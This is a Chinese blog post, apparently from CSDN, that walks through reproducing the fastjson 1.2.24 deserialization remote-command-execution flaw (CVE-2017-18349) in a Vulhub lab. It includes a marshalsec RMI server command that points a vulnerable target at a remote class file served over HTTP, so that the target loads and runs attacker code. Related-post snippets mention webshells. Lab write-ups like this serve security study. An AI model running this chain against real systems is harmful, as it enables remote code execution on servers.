fastjson 1.2.24 反序列化导致任意命令执行漏洞复现

最新推荐文章于 2024-08-02 16:59:58 发布
最新推荐文章于 2024-08-02 16:59:58 发布
阅读量852 收藏
点赞数
文章标签: 安全 web安全 java 系统安全 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ZxC789456302/article/details/127080702
版权

开头吐槽一下重装完的kali,太折磨人了,环境重配+各种出错,人已经麻了....

需要用到

①的jdk<11(这里推荐jdk8,jdk9对反射有了新增要求,可能会出现一些不必要的错误)

②marshalsec

正式开始复现

准备阶段

 

这里使用Vulhub进行复现,开启得到环境

 

 这是早期版本的漏洞,绕过方式很多,这里就用靶场提供的

在fastjson/1.2.24-rce目录下创建TouchFile.java文件

 

使用

 

javac TouchFile.java

进行编译生成class文件

之后在marshalse-master文件夹下运行

mvn clean package -DskipTests

做好准备

并且这里需要用到服务器,推荐直接用kali或开启靶场的机器当做服务器

在fastjson/1.2.24-rce目录下执行

python3 -m http.server (不加端口默认8000)

 确认服务器搭建成功后开始进行下一步

经过上面的操作marshalse-master文件夹下已经生成了target文件夹

需要用到的就是这个marshalsec-0.0.3-SNAPSHOT-all.jar 

 接下来开始攻击

攻击阶段

借助marshalsec项目,启动一个RMI服务器,监听9999端口,并制定加载远程类:TouchFile.class

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.150.128:8000/#TouchFile" 9999

其中网址是服务器开设的地址,端口对应

 

POST方式发送攻击包

 结果检测

docker ps  查看运行中的docker
进入docker:docker exec -it 1e149b66db15 /bin/bash

可以看到tmp目录下已经出现success文件,复现成功

PS:捏麻麻滴复现的时候想把以前乱配jdk的自己埋起来,mvn报了半天错一看竟然是java和javac版本不一样...也是真的绝了,结果重新配了一套jdk1.8

配环境不规范,后期使用两行泪...... 

白白白无
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
复现fastjson 1.2.24 反序列化导致任意命令执行漏洞
DXfighting_的博客
04-15 466
生成带有PHP马的class文件 把编译好的class文件传到外网系统中(这里我传到kali服务器中),并在class文件所在 的目录,Python起一个http服务。 使用marshalsec项目 启动RMI服务, 监听9999端口并加载远程类TouchFile.class: 使用burpsuite抓包后改GET包为POST包,然后在发送的请求数据包中输入以下如图payload 之后使用蚁剑连...
fastjson 1.2.24 反序列化导致任意命令执行漏洞 复现超详细步骤
yc11223344的博客
07-05 1398
在本地启动环境: 首先我们需要一个java的环境 新建文件夹并且在文件夹里面建一个txt文件命名为TouchFile.java,里面写入代码 cmd在文件夹目录运行 就会看到生成了一个class文件可以看一下这位师傅的文章python2.x执行命令为python3.x执行命令为要在class文件下执行命令,进行监听8000端口 我们可以访问:本机ip:8000 我们借助marshalsec项目开启RMI服务,监听9999端口 下载完marshalsec之后,进到该目录下cmd运行会生成一个target文件夹
Fastjson1.2.24-RCE (CVE-2017-18349)
aetlypdlg_ys的博客
05-12 904
fastjson是阿里巴巴的开源JSON解析库,它可以解析JSON格式的字符串,支持将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化JavaBean。即fastjson的主要功能就是将Java Bean序列化成JSON字符串,这样得到字符串之后就可以通过数据库等方式进行持久化了。阿里巴巴公司开源Java开发组件Fastjson存在反序列化漏洞(CNVD-2022-40233)。
FastJson1.2.24反序列化导致任意命令执行漏洞复现(CVE-2017-18349)
又菜又爱倒腾的博客
10-29 2353
#FastJson1.2.24反序列化导致任意命令执行漏洞(CVE-2017-18349)# 一、漏洞简介 Pippo是一款基于JavaWeb框架。FastjsonEngine是其中的一个JSON处理引擎。Fastjson是其中的一个基于Java的JSON解析器/生成器。 Pippo 1.11.0版本中的FastjsonEngine所使用的Fastjson 1.2.25之前版本的parseObject存在安全漏洞。利用fastjson autotype在处理json对象时,未对@type字段进行安全安全
Fastjson 1.2.24 反序列化导致任意命令执行漏洞复现(CVE-2017-18349)
Welcome To Myon'Blog !
03-09 2164
Fastjson 是一个 Java 库,用于在 Java 对象和 JSON 数据之间进行转换,它提供了一种简单而高效的方式来序列化 Java 对象为 JSON 格式的字符串,以及将 JSON 字符串反序列化Java 对象。Fastjson 支持各种类型的 Java 对象,包括预先存在但没有源代码的对象。
Fastjson 1.2.24 反序列化导致任意命令执行漏洞
不曾扬帆,何以至远方
07-15 889
fastjson 1.2.24 反序列化
fastjsonfastjson 1.2.24 反序列化导致任意命令执行
bqnagus
10-01 860
fastjsonfastjson 1.2.24 反序列化导致任意命令执行
fastjson 1.2.24 反序列化导致任意命令执行漏洞
weixin_62117955的博客
06-03 1033
fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。FastJson是阿里巴巴的开源JSON解析库,它可以解析JSON格式的字符串,支持将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化JavaBean。注:该漏洞可以反弹shell,方法与命令执行一样,构造的payload也与命令执行的一样,这里就不展示了。应用程序,用于接收和处理客户端的远程方法调用请求,实现分布式系统中的远程通信和方法调用。
fastjson 1.2.24 反序列化导致任意命令执行漏洞(CVE-2017-18349)
qq_51163834的博客
06-24 796
fastjsonjava的一个库,可以将java对象转化为json格式的字符串,也可以将json格式的字符串转化为java对象。
fastjson1.2.24 反序列化导致任意命令执行漏洞(CVE-2017-18349)
1ance's blog
07-24 1517
CVE-2017-18349漏洞原理 漏洞原理
fastjson1.2.24反序列化RCE
06-24
**Fastjson 1.2.24 反序列化远程代码执行漏洞详解** 在Java开发中,Fastjson是一个广泛使用的高性能JSON库,它提供了一种快速解析和生成JSON的机制。然而,像许多处理序列化和反序列化的库一样,Fastjson在某些版本...
fastjson1.2.8 反序列化远程代码执行漏洞
05-08
astjson采用黑白名单的方法来防御反序列化漏洞导致当黑客不断发掘新的反序列化Gadgets类时,在autoType关闭的情况下仍然可能可以绕过黑白名单防御机制,造成远程命令执行漏洞。经研究,该漏洞利用门槛较低,可绕过...
SpringBoot Redis配置Fastjson进行序列化和反序列化实现
10-16
本篇将详细介绍如何在Spring Boot中配置Fastjson进行序列化和反序列化,以实现与Redis的高效交互。 Fastjson是阿里巴巴开发的一款高性能的JSON处理库,它提供了快速的序列化和反序列化能力,支持多种Java类型,包括...
鸿蒙系统开发【加解密】安全
2301_76813281的博客
08-02 614
本示例使用cryptoFramework接口的Cipher对象相关方法实现了字符串加解密算法,包括RSA加密算法与AES加密算法。
鸿蒙系统开发【加解密算法库框架】安全
最新发布
2301_76813281的博客
08-02 499
本示例使用@ohos.security.cryptoFramework相关接口实现了对文本文件的加解密、签名验签操作。
发送邮箱调用接口时需要注意哪些安全事项?
DengHua2203的博客
08-02 280
发送邮箱调用接口时,确保安全性是一个复杂而重要的任务。通过以上措施,可以显著提高接口的安全性。AokSend,发送邮箱调用接口,API与SMTP无缝对接,一键触发,邮件秒达,营销快人一步!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值